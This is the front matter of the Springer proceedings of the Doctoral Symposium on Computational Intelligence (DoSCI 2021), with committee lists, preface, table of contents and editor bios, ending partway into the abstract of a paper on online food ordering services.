
Advances in Intelligent Systems and Computing 1374

Deepak Gupta · Ashish Khanna · Vineet Kansal ·
Giancarlo Fortino · Aboul Ella Hassanien Editors

Proceedings of Second
Doctoral Symposium
on Computational
Intelligence
DoSCI 2021
Advances in Intelligent Systems and Computing

Volume 1374

Series Editor
Janusz Kacprzyk, Systems Research Institute, Polish Academy of Sciences,
Warsaw, Poland

Advisory Editors
Nikhil R. Pal, Indian Statistical Institute, Kolkata, India
Rafael Bello Perez, Faculty of Mathematics, Physics and Computing,
Universidad Central de Las Villas, Santa Clara, Cuba
Emilio S. Corchado, University of Salamanca, Salamanca, Spain
Hani Hagras, School of Computer Science and Electronic Engineering,
University of Essex, Colchester, UK
László T. Kóczy, Department of Automation, Széchenyi István University,
Gyor, Hungary
Vladik Kreinovich, Department of Computer Science, University of Texas
at El Paso, El Paso, TX, USA
Chin-Teng Lin, Department of Electrical Engineering, National Chiao
Tung University, Hsinchu, Taiwan
Jie Lu, Faculty of Engineering and Information Technology,
University of Technology Sydney, Sydney, NSW, Australia
Patricia Melin, Graduate Program of Computer Science, Tijuana Institute
of Technology, Tijuana, Mexico
Nadia Nedjah, Department of Electronics Engineering, University of Rio de Janeiro,
Rio de Janeiro, Brazil
Ngoc Thanh Nguyen, Faculty of Computer Science and Management,
Wrocław University of Technology, Wrocław, Poland
Jun Wang, Department of Mechanical and Automation Engineering,
The Chinese University of Hong Kong, Shatin, Hong Kong
The series “Advances in Intelligent Systems and Computing” contains publications
on theory, applications, and design methods of Intelligent Systems and Intelligent
Computing. Virtually all disciplines such as engineering, natural sciences, computer
and information science, ICT, economics, business, e-commerce, environment,
healthcare, life science are covered. The list of topics spans all the areas of modern
intelligent systems and computing such as: computational intelligence, soft comput-
ing including neural networks, fuzzy systems, evolutionary computing and the fusion
of these paradigms, social intelligence, ambient intelligence, computational neuro-
science, artificial life, virtual worlds and society, cognitive science and systems,
Perception and Vision, DNA and immune based systems, self-organizing and
adaptive systems, e-Learning and teaching, human-centered and human-centric
computing, recommender systems, intelligent control, robotics and mechatronics
including human-machine teaming, knowledge-based paradigms, learning para-
digms, machine ethics, intelligent data analysis, knowledge management, intelligent
agents, intelligent decision making and support, intelligent network security, trust
management, interactive entertainment, Web intelligence and multimedia.
The publications within “Advances in Intelligent Systems and Computing” are
primarily proceedings of important conferences, symposia and congresses. They
cover significant recent developments in the field, both of a foundational and
applicable character. An important characteristic feature of the series is the short
publication time and world-wide distribution. This permits a rapid and broad
dissemination of research results.
Indexed by DBLP, INSPEC, WTI Frankfurt eG, zbMATH, Japanese Science and
Technology Agency (JST).
All books published in the series are submitted for consideration in Web of Science.

More information about this series at http://www.springer.com/series/11156


Deepak Gupta · Ashish Khanna · Vineet Kansal ·
Giancarlo Fortino · Aboul Ella Hassanien
Editors

Proceedings of Second
Doctoral Symposium
on Computational
Intelligence
DoSCI 2021
Editors

Deepak Gupta
Department of Computer Science Engineering
Maharaja Agrasen Institute of Technology
Rohini, Delhi, India

Ashish Khanna
Maharaja Agrasen Institute of Technology
Rohini, Delhi, India

Vineet Kansal
Institute of Engineering and Technology
Lucknow, Uttar Pradesh, India

Giancarlo Fortino
University of Calabria
Rende, Cosenza, Italy

Aboul Ella Hassanien
Department of Information Technology
Cairo University
Giza, Egypt

Advances in Intelligent Systems and Computing
ISSN 2194-5357 ISSN 2194-5365 (electronic)
ISBN 978-981-16-3345-4 ISBN 978-981-16-3346-1 (eBook)
https://doi.org/10.1007/978-981-16-3346-1

© The Editor(s) (if applicable) and The Author(s), under exclusive license to Springer Nature
Singapore Pte Ltd. 2022
This work is subject to copyright. All rights are solely and exclusively licensed by the Publisher, whether
the whole or part of the material is concerned, specifically the rights of translation, reprinting, reuse
of illustrations, recitation, broadcasting, reproduction on microfilms or in any other physical way, and
transmission or information storage and retrieval, electronic adaptation, computer software, or by similar
or dissimilar methodology now known or hereafter developed.
The use of general descriptive names, registered names, trademarks, service marks, etc. in this publication
does not imply, even in the absence of a specific statement, that such names are exempt from the relevant
protective laws and regulations and therefore free for general use.
The publisher, the authors and the editors are safe to assume that the advice and information in this book
are believed to be true and accurate at the date of publication. Neither the publisher nor the authors or
the editors give a warranty, expressed or implied, with respect to the material contained herein or for any
errors or omissions that may have been made. The publisher remains neutral with regard to jurisdictional
claims in published maps and institutional affiliations.

This Springer imprint is published by the registered company Springer Nature Singapore Pte Ltd.
The registered company address is: 152 Beach Road, #21-01/04 Gateway East, Singapore 189721,
Singapore
Dr. Deepak Gupta would like to dedicate this
book to his father Sh. R. K. Gupta and his
mother Smt. Geeta Gupta for their constant
encouragement, and his family members
including his wife, brothers, sisters and kids,
and to his students close to his heart.
Dr. Ashish Khanna would like to dedicate this
book to his mentors Dr. A. K. Singh and
Dr. Abhishek Swaroop for their constant
encouragement and guidance and his family
members including his mother, wife and kids.
He would also like to dedicate this work to
his (late) father Sh. R. C. Khanna with folded
hands for his constant blessings.
Prof. (Dr.) Vineet Kansal would like to
dedicate this book to his father Sh. Vinod
Kumar and his mother late (Smt.) Usha
Gupta.
Prof. (Dr.) Aboul Ella Hassanien would like
to dedicate this book to his wife Nazaha
Hassan.
DoSCI 2021 Steering Committee Members

Chief Patrons

Prof. Vinay Kumar Pathak, Vice Chancellor, AKTU, Lucknow

Patrons

Prof. H. K. Paliwal, Director, IET, Lucknow


Prof. D. S. Yadav, Head, CSE, IET, Lucknow

General Chairs

Prof. Vineet Kansal, IET, Lucknow


Prof. Giancarlo Fortino, Università della Calabria, Italy

Honorary Chairs

Prof. Oscar Castillo, Tijuana Institute of Technology, Tijuana, Mexico


Prof. Aboul Ella Hassanien, Cairo University, Egypt


Symposium Chairs

Prof. Siddhartha Bhattacharyya, Professor, CHRIST University, Bangalore


Prof. Valentina Emilia Balas, Aurel Vlaicu University of Arad, Romania

Technical Program Chairs

Prof. Tapobrata Lahiri, IIIT Prayagraj, India


Prof. Sanjay K. Saha, Jadavpur University, India
Prof. Surya Agnihotri, IIT Indore, India
Prof. Joel J. P. C. Rodrigues, Federal University of Piaui (UFPI), Teresina, PI, Brazil
Prof. Victor Hugo C. de Albuquerque, Universidade de Fortaleza, Brazil
Prof. N. P. Gopalan, NIT Trichy, India
Prof. Sarabjeet Singh, Panjab University, Chandigarh, India
Prof. Vivek Kumar Singh, BHU, Varanasi, India

Editorial Chairs

Prof. Girish Chandra, IET, Lucknow


Prof. Y. N. Singh, IET, Lucknow
Prof. Abhishek Swaroop, Bhagwan Parshuram Institute of Technology, Delhi

Conveners

Dr. Ashish Khanna, Maharaja Agrasen Institute of Technology (GGSIPU), New


Delhi
Dr. Deepak Gupta, Maharaja Agrasen Institute of Technology (GGSIPU), New Delhi

Publication Chairs

Prof. Aboul Ella Hassanien, Cairo University, Egypt


Prof. Giancarlo Fortino, Università della Calabria, Italy
Prof. Neeraj Kumar, Thapar Institute of Engineering and Technology, Thapar
University, Patiala, Punjab
Dr. Vicente García Díaz, University of Oviedo, Spain

Publicity Chairs

Dr. M. Tanveer, Indian Institute of Technology Indore, India


Dr. Jafar A. Alzubi, Al-Balqa Applied University, Salt, Jordan

Co-convener

Mr. Moolchand Sharma, Maharaja Agrasen Institute of Technology, India

Organizing Chairs

Dr. Parul Yadav, IET, Lucknow


Dr. Upendra Kumar, IET, Lucknow

Organizing Team

Dr. Mahima Shanker Pandey, IET, Lucknow


Dr. Tulika Narang, IET, Lucknow
Dr. Pratibha Pandey, IET, Lucknow
Dr. Sameeksha Tandon, IET, Lucknow
Dr. Mudita Saran, IET, Lucknow
Dr. Esha Tripathi, IET, Lucknow
Dr. Namita Srivastava, IET, Lucknow
Dr. Deepali Awasthi, IET, Lucknow
Dr. Deepa Verma, IET, Lucknow
Dr. Abhishek Singh, IET, Lucknow
Dr. Sudhani Verma, IET, Lucknow
Dr. Abhay Kr. Vajpayee, IET, Lucknow
Dr. Sonam Srivastava, IET, Lucknow
Preface

We hereby are delighted to announce that the Institute of Engineering and Tech-
nology, a constituent college of Dr. A. P. J. Abdul Kalam Technical University,
Lucknow, India, has hosted the eagerly awaited and much coveted Doctoral Sympo-
sium on Computational Intelligence (DoSCI 2021)—An International Conference in
Online Mode. The second edition of the symposium attracted a diverse range
of engineering practitioners, academicians, scholars and industry delegates, with the
received abstracts involving more than 1,600 authors from different parts of the
world. The committee of professionals dedicated to the symposium strove
to achieve a high-quality technical program with a track on computational intelli-
gence, an area in which, together with its related sub-areas, a great deal of research is
currently under way. More than 400 full-length papers were received, with contributions
focused on theoretical work, computer simulation-based research
and laboratory-scale experiments. Among these manuscripts, 74 papers have been
included in the Springer proceedings after a thorough two-stage review and editing
process. All the manuscripts submitted to DoSCI 2021 were peer-reviewed by at least
two independent reviewers, who were provided with a detailed review proforma.
The comments from the reviewers were communicated to the authors, who incorpo-
rated the suggestions in their revised manuscripts. The recommendations from two
reviewers were taken into consideration while selecting a manuscript for inclusion
in the proceedings. The exhaustiveness of the review process is evident, given the
large number of articles received addressing a wide range of research areas. The
stringent review process ensured that each published manuscript met the rigorous
academic and scientific standards. It is an exalting experience to finally see these
elite contributions materialize into a book volume as DoSCI 2021 proceedings by
Springer entitled “Doctoral Symposium on Computational Intelligence.”
DoSCI 2021 invited four keynote speakers, who are eminent researchers in the
field of computer science and engineering, from different parts of the world. In addi-
tion to the plenary sessions on the day of the symposium, nine concurrent technical
sessions were held to accommodate the oral presentation of the 74 accepted
papers. Keynote speakers and session chair(s) for each of the concurrent sessions
have been leading researchers from the thematic area of the session. A technical


exhibition was held throughout the day of the symposium, putting on display
the latest technologies, expositions, ideas and presentations. The research part of the
symposium was organized in a total of 16 special sessions. These special sessions
provided the opportunity for researchers conducting research in specific areas to
present their results in a more focused environment.
An international symposium of such magnitude and release of the DoSCI 2021
proceedings by Springer has been the remarkable outcome of the untiring efforts
of the entire organizing team. The success of an event undoubtedly involves the
painstaking efforts of several contributors at different stages, dictated by their devo-
tion and sincerity. Fortunately, since the beginning of its journey, DoSCI 2021 has
received support and contributions from every corner. We thank all those who have
wished the best for DoSCI 2021 and contributed by any means toward its success.
The edited proceedings volume by Springer would not have been possible without the
perseverance of all the steering, advisory and technical program committee members.
The organizers of DoSCI 2021 thank all the contributing authors for
their interest and exceptional articles. We would also like to thank the authors of the
papers for adhering to the time schedule and for incorporating the review comments.
We wish to extend our heartfelt acknowledgment to the authors, peer-reviewers,
committee members and production staff whose diligent work put shape to the DoSCI
2021 proceedings. We especially want to thank our dedicated team of peer-reviewers
who volunteered for the arduous and tedious step of quality checking and critique on
the submitted manuscripts. We wish to thank our faculty colleagues Mr. Moolchand
Sharma and Ms. Prerna Sharma for extending their enormous assistance during the
symposium. The time spent by them and the midnight oil burnt is greatly appreciated,
for which we will ever remain indebted. The management, faculties, administrative
and support staff of the college have always been extending their services whenever
needed, for which we remain thankful to them.
Lastly, we would like to thank Springer for accepting our proposal for publishing
the DoSCI 2021 symposium proceedings. Help received from Mr. Aninda Bose, the
senior acquisitions editor, in the process has been very useful.

Rohini, India
Ashish Khanna
Deepak Gupta
Organizers, DoSCI 2021
Contents

Investigation of Consumer Perception Toward Digital Means
of Food Ordering Services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
Arpita Srivastava, Radhika Malhotra, Arvind Kumar Bhatt,
and Priyanka Srivastava
A Systematic Review of Blockchain Technology to Find Current
Scalability Issues and Solutions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
Bhargavi K. Chauhan and Dhirenbhai B. Patel
Secured Blind Image Watermarking Using Entropy Technique
in DCT Domain . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
Megha Gupta and R. Rama Kishore
Prediction of Heart Disease Using Genetic Algorithm . . . . . . . . . . . . . . . . . 49
Nagaraj M. Lutimath, H. V. Ramachandra, S. Raghav, and Neha Sharma
Secured Information Infrastructure for Exchanging Information
for Digital Governance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 59
Mohd Shukri Alias and S. B. Goyal
Spiral CAPTCHA with Adversarial Perturbation and Its Security
Analysis with Convolutional Neural Network . . . . . . . . . . . . . . . . . . . . . . . . . 67
Shivani and C. Rama Krishna
Predicting Classifiers Efficacy in Relation with Data Complexity
Metric Using Under-Sampling Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . 85
Deepika Singh, Anju Saha, and Anjana Gosain
Enhanced Combined Multiplexing Algorithm (ECMA)
for Wireless Body Area Network (WBAN) . . . . . . . . . . . . . . . . . . . . . . . . . . . 93
Poonam Rani, Ankur Dumka, Rishika Yadav, and Vikas Yadav
A Survey: Approaches to Facial Detection and Recognition
with Machine Learning Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 103
Prateek Singhal, Prabhat Kumar Srivastava, Arvind Kumar Tiwari,
and Ratnesh Kumar Shukla

An Energy- and Space-Efficient Trust-Based Secure Routing
for OppIoT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 127
Nisha Kandhoul and Sanjay K. Dhurandher
A Survey on Anomaly Detection Techniques in IoT . . . . . . . . . . . . . . . . . . . 139
Priya Sharma and Sanjay Kumar Sharma
Novel IoT End Device Architecture for Enhanced CIA:
A Lightweight Security Approach . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 147
Prateek Mishra, Sanjay Kumar Yadav, Ravi Kumar Sachdeva,
and Rajesh Tiwari
Addressing Concept Drifts Using Deep Learning for Heart Disease
Prediction: A Review . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 157
Ketan Sanjay Desale and Swati V. Shinde
Tailoring the Controller Parameters Using Hybrid Flower
Pollination Algorithm for Performance Enhancement
of Multisource Two Area Power System . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 169
Megha Khatri, Pankaj Dahiya, and S. Hareesh Reddy
Automatic Extractive Summarization for English Text: A Brief
Survey . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 183
Sunil Dhankhar and Mukesh Kumar Gupta
Formal Verification of Liveness Properties in Causal Order
Broadcast Systems Using Event-B . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 199
Pooja Yadav, Raghuraj Suryavanshi, and Divakar Yadav
A Comparative Study on Face Recognition AI Robot . . . . . . . . . . . . . . . . . 211
Somesh Sunar, Shailendra K. Tripathi, Usha Tiwari, and Harshit Srivastava
State-of-the-Art Power Management Techniques . . . . . . . . . . . . . . . . . . . . . 223
Maaz Ahmed and Waseem Ahmed
Application of Robotics in Digital Farming . . . . . . . . . . . . . . . . . . . . . . . . . . . 237
Drishti Agarwal, Aakash Mangla, and Preeti Nagrath
Study and Performance Analysis of Image Fusion Techniques
for Multi-focus Images . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 247
Vineeta Singh and Vandana Dixit Kaushik
IoT-Based Agricultural Automation Using LoRaWAN . . . . . . . . . . . . . . . . 261
Jaisal Chauhan, K. Agathiyan, and Neha Arora
Prediction of Customer Lifetime Value Using Machine Learning . . . . . . . 271
Kandula Balagangadhar Reddy, Debabrata Swain, Samiksha Shukla,
and Lija Jacob

An Intelligent Flood Forecasting System Using Artificial Neural
Network in WSN . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 279
K. S. Raghu Kumar and Rajashree V. Biradar
Reinforcement Learning in Deep Web Crawling: Survey . . . . . . . . . . . . . . 291
Kapil Madan and Rajesh Bhatia
Wireless Sensor Network for Various Hardware Parameters
for Orientational and Smart Sensing Using IoT . . . . . . . . . . . . . . . . . . . . . . 301
Mohammad Danish Gazi, Manisha Rajoriya, Pallavi Gupta, and Ashish Gupta
Comparative Analysis: Role of Meta-Heuristic Algorithms
in Image Watermarking Optimization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 315
Preeti Garg and R. Rama Kishore
A Novel Seven-Dimensional Hyperchaotic . . . . . . . . . . . . . . . . . . . . . . . . . . . 329
M. Lellis Thivagar, Abdulsattar Abdullah Hamad, B. Tamilarasan,
and G. Kabin Antony
A Literature Review on H∞ Neural Network Adaptive Control . . . . . . . . 341
Parul Kashyap
A Novel DWT and Deep Learning Based Feature Extraction
Technique for Plant Disease Identification . . . . . . . . . . . . . . . . . . . . . . . . . . . 355
Kirti, Navin Rajpal, and Jyotsna Yadav
Supervised and Unsupervised Machine Learning Techniques
for Multiple Sclerosis Identification: A Performance Comparative
Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 369
Shikha Jain, Navin Rajpal, and Jyotsna Yadav
Cloud Computing Overview of Wireless Sensor Network (WSN) . . . . . . . 383
Mahendra Prasad Nath, Sushree Bibhuprada B. Priyadarshini,
and Debahuti Mishra
An Enhanced Support Vector Machine for Face Recognition
in Fisher Subspace . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 393
Tanvi Jain and Jyotsna Yadav
Large Scale Double Density Dual Tree Complex Wavelet
Transform Based Robust Feature Extraction for Face Recognition . . . . . 409
Juhi Chaudhary and Jyotsna Yadav
A Miscarriage Prevention System Using Machine Learning
Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 423
Sarmista Biswas and Samiksha Shukla
Efficacious Governance During Pandemics Like Covid-19 Using
Intelligent Decision Support Framework for User Generated
Content . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 435
Rajni Jindal and Anshu Malhotra

Skin Disease Diagnosis: Challenges and Opportunities . . . . . . . . . . . . . . . . 449
Vatsala Anand, Sheifali Gupta, and Deepika Koundal
Computerized Assisted Segmentation of Brain Tumor Using Deep
Convolutional Network . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 461
Deepa Verma and Mahima Shanker Pandey
Leader Election Algorithm in Fault Tolerant Distributed System . . . . . . . 471
Sudhani Verma, Divakar Yadav, and Girish Chandra
Engine Prototype and Testing Measurements of Autonomous
Rocket-Based 360 Degrees Cloud Seeding Mechanism . . . . . . . . . . . . . . . . 481
Satyabrat Shukla, Gautam Singh, and Purnima Lala Mehta
An Efficient Caching Approach for Content-Centric-Based
Internet of Things Networks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 499
Sumit Kumar, Rajeev Tiwari, and Gaurav Goel
A Forecasting Technique for Powdery Mildew Disease Prediction
in Tomato Plants . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 509
Anshul Bhatia, Anuradha Chug, Amit Prakash Singh,
Ravinder Pal Singh, and Dinesh Singh
Investigate the Effect of Rain, Foliage, Atmospheric Gases,
and Diffraction on Millimeter (mm) Wave Propagation for 5G
Cellular Networks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 521
Animesh Tripathi, Pradeep K. Tiwari, Shiv Prakash, and N. K. Shukla
Packet Scheduling Algorithm to improvise the Packet Delivery
Ratio in Mobile Ad hoc Networks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 535
Suresh Kurumbanshi, Shubhangi Rathkanthiwar, and Shashikant Patil
Computer-Aided Detection and Diagnosis of Lung Nodules Using
CT Scan Images: An Analytical Review . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 545
Nikhat Ali and Jyotsna Yadav
Efficient Interleaver Design for SC-FDMA/IDMA Systems . . . . . . . . . . . . . 559
Roopali Agarwal and Manoj Kumar Shukla
Enhanced Bio-inspired Trust and Reputation Model for Wireless
Sensor Networks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 569
Vivek Arya, Sita Rani, and Nilam Choudhary
Analytical Machine Learning for Medium-Term Load Forecasting
Towards Agricultural Sector . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 581
Megha Sharma, Namita Mittal, Anukram Mishra, and Arun Gupta
Formal Modelling of Cluster-Coordinator-Based Load Balancing
Protocol Using Event-B . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 593
Shantanu Shukla, Raghuraj Suryavanshi, and Divakar Yadav

Regression Test Case Selection: A Comparative Analysis
of Metaheuristic Algorithms . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 605
Abhishek Singh Verma, Ankur Choudhary, and Shailesh Tiwari
A Comprehensive Study on SQL Injection Attacks, Their Mode,
Detection and Prevention . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 617
Sabyasachi Dasmohapatra and Sushree Bibhuprada B. Priyadarshini
Sentimental Analysis on Sarcasm Detection with GPS Tracking . . . . . . . . 633
Mudita Sharan and M. Ravinder
Impact of Machine Learning Algorithms on WDM High-Speed
Optical Networks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 645
Saloni Rai and Amit Kumar Garg
Duo Features with Hybrid-Meta-Heuristic-Deep Belief Network
Based Pattern Recognition for Marathi Speech Recognition . . . . . . . . . . . 665
Ravindra P. Bachate, Ashok Sharma, and Amar Singh
Computer-Aided Diagnostic of COVID-19 Using Chest X-Ray
Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 675
Mangala Shetty and Spoorthi Shetty
Low Cost Compact Multiband Printed Antenna for Wireless
Communication Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 683
Rachna Prabha, Pratibha Pandey, G. S. Tripathi, and Sudhanshu Verma
A Detailed Analysis of Word Sense Disambiguation Algorithms
and Approaches for Indian Languages . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 693
Archana Sachindeo Maurya and Promila Bahadur
Fiber Bragg Grating (FBG) Sensor for the Monitoring of Cardiac
Parameters in Healthcare Facilities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 711
Ambarish G. Mohapatra, Pradyumna Kumar Tripathy,
Maitri Mohanty, and Ashish Khanna
Early-Stage Coronary Ailment Prediction Using Dimensionality
Reduction and Data Mining Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 721
Krittika Dutta, Satish Chandra, and Mahendra Kumar Gourisaria
Inferring the Occurrence of Chronic Kidney Failure: A Data
Mining Solution . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 735
Rwittika Pramanik, Sandali Khare, and Mahendra Kumar Gourisaria
Comparative Analysis for Optimal Tuning of DC Motor Position
Control System . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 749
Avi Singhal, Dhruv Mittal, Ritwik Roy, and Pankaj Dahiya
A Hybrid Approach of ANN-PSO Technique for Anomaly Detection . . . 757
Sonika Dahiya, Priyansh Soni, Hridya Shiju Nadappattel,
and Mohammad Fraz

Comparison of Density-Based and Distance-Based Outlier
Identification Methods in Fuzzy Clustering . . . . . . . . . . . . . . . . . . . . . . . . . . 769
Anjana Gosain and Sonika Dahiya
Analysis of Security Issues in Blockchain Wallet . . . . . . . . . . . . . . . . . . . . . . 779
Taruna and Rishabh
A Contextual Framework to Find Similarity Between Users
on Twitter . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 793
Sonika Dahiya, Gaurav Kumar, and Arnav Yadav
On the Design of a Smart Mirror for Cardiovascular Risk
Prediction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 807
Gianluca Zaza
Named Entity Recognition in Natural Language Processing:
A Systematic Review . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 817
Abhishek Sharma, Amrita, Sudeshna Chakraborty, and Shivam Kumar
Assessing Spatiotemporal Transmission Dynamics of COVID-19
Outbreak Using AI Analytics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 829
Mayuri Gupta, Yash Kumar Singhal, and Adwitiya Sinha
Detection of Building Defects Using Convolutional Neural Networks . . . 839
Dokuparthi Sai Santhoshi Bhavani, Abhijit Adhikari, and D. Sumathi
Tools and Techniques for Machine Translation . . . . . . . . . . . . . . . . . . . . . . . 857
Archana Sachindeo Maurya, Srishti Garg, and Promila Bahadur
Cyberbullying-Mediated Depression Detection in Social Media
Using Machine Learning . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 869
Akshi Kumar and Nitin Sachdeva
Improved Patient-Independent Seizure Detection System Using
Novel Feature Extraction Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 879
Durgesh Nandini, Jyoti Yadav, Asha Rani, and Vijander Singh
Solution to Economic Dispatch Problem Using Modified PSO
Algorithm . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 889
Amritpal Singh and Aditya Khamparia
Recommendations for DDOS Attack-Based Intrusion Detection
System Through Data Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 899
Sagar Pande, Aditya Khamparia, and Deepak Gupta
Drug-Drug Interaction Prediction Based on Drug Similarity
Matrix Using a Fully Connected Neural Network . . . . . . . . . . . . . . . . . . . . . 911
Alok Kumar and Moolchand Sharma

Author Index . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 921


About the Editors

Dr. Deepak Gupta is an eminent academician and plays versatile roles and respon-
sibilities juggling between lectures, research, publications, consultancy, community
service, Ph.D. and post-doctorate supervision, etc. With 13 years of rich expertise in
teaching and two years in industry; he focuses on rational and practical learning.
He has contributed massive literature in the fields of human–computer interac-
tion, intelligent data analysis, nature-inspired computing, machine learning and soft
computing. He is working as Assistant Professor at Maharaja Agrasen Institute of
Technology (GGSIPU), Delhi, India. He has served as Editor-in-Chief, Guest Editor,
Associate Editor in SCI and various other reputed journals. He has authored/edited
44 books with national/international level publishers. He has published 140 scientific
research publications in reputed international journals and conferences including 68
SCI indexed journals. He has also filed 3 patents.

Dr. Ashish Khanna has 16 years of rich expertise in teaching, entrepreneurship


and research and development. He received his Ph.D. degree from National Insti-
tute of Technology, Kurukshetra. He has completed his M.Tech. and B.Tech. at
GGSIPU, Delhi. He has completed his postdoc from Internet of Things Lab at
Inatel, Brazil, and University of Valladolid, Spain. He has published around 61
SCI indexed papers in IEEE Transaction, Springer, Elsevier, Wiley and many more
reputed journals with cumulative impact factor of above 160. He has around 120
research articles in top SCI/Scopus journals, conferences and book chapters. He is the
co-author of around 30 edited and textbooks. His research interest includes MANET,
FANET, IoT, machine learning and many more. He has served in the research field as
Keynote Speaker/Faculty Resource Person/Session Chair/Reviewer/TPC Member/
Post-doctorate supervision. He is Convener and Organizer of ‘ICICC’ and ICDAM
conference series. He has 3 published patents to his credit.

Prof. (Dr.) Vineet Kansal studied at Indian Institute of Technology, Delhi, and
is currently working as Professor with Institute of Engineering & Technology,
Dr. A. P. J. Abdul Kalam Technical University, Lucknow. He was awarded appre-
ciation by NPTEL, IIT Kanpur and Centre of Continuing education, IIT Kanpur
for inspiring the faculty members and students of higher technical education to

adopt NPTEL Online certification courses for evangelizing its modus operandi and
for conceptualizing online and offline blended faculty training programs addressing
pedagogical issues in engineering education in the state of Uttar Pradesh, India.

Prof. (Dr.) Giancarlo Fortino is Full Professor at the University of Calabria


(Unical), Italy. He is a director of the Smart, Pervasive, and Mobile Systems Engi-
neering lab at Unical as well as a co-chair of joint labs to study the Internet of things
(IoT) that were established between Unical and Wuhan University of Technology,
Southern Medical University and Huazhong Agricultural University in China. In
addition, he is a co-founder and a chief executive officer of SenSysCal, a Unical
spinoff focused on innovative IoT systems. His research interests include agent-based
computing, wireless (body) sensor networks and IoT.

Prof. (Dr.) Aboul Ella Hassanien is Founder and Head of the Egyptian Scientific
Research Group (SRGE). Hassanien has more than 1000 scientific research papers
published in prestigious international journals and over 50 books covering such
diverse topics as data mining, medical images, intelligent systems, social networks
and smart environment. Prof. Hassanien won several awards including the Best
Researcher of the Youth Award of Astronomy and Geophysics of the National
Research Institute, Academy of Scientific Research (Egypt, 1990). He was also
granted a Scientific Excellence Award in Humanities from the University of Kuwait
in 2004 and received the University Award for Scientific Superiority (Cairo University,
2013). Also, he was honored in Egypt as the best researcher at
Cairo University in 2013. He has also received the Islamic Educational, Scientific
and Cultural Organization (ISESCO) prize on Technology (2014) and received the
State Award for Excellence in Engineering Sciences 2015.
Investigation of Consumer Perception
Toward Digital Means of Food Ordering
Services

Arpita Srivastava, Radhika Malhotra, Arvind Kumar Bhatt,


and Priyanka Srivastava

Abstract Eating at a restaurant once used to be an occasional event, but it is a routine


thing for today’s generation. With the advent of food delivery apps, combined with
the e-commerce technology, the online food ordering services have simplified the
doorstep delivery of food (Mustafa in Proceedings of the 2016 International Confer-
ence on Industrial Engineering and Operations Management Detroit, Michigan, USA,
[1]). Today, the lifestyle of millennials has changed. They usually have very hectic
work schedules, and as a result, for their everyday meals, a number of people are
opting for the reliability and convenience of cloud kitchens (PTI in Zomato expands
food delivery business to 213 cities across India, [2]). The consumers include millen-
nials who are short of time and want instant delivery of food within a few minutes,
along with people who are food lovers and just want to have a relaxing experi-
ence in the comfort of their homes. A study has been conducted by Market Research
Future, a business consultancy firm, with the title “Digital Platforms Reign in the Food
Ordering Market” (Van Alstyne et al. in Harvard Business Review, [3]). According
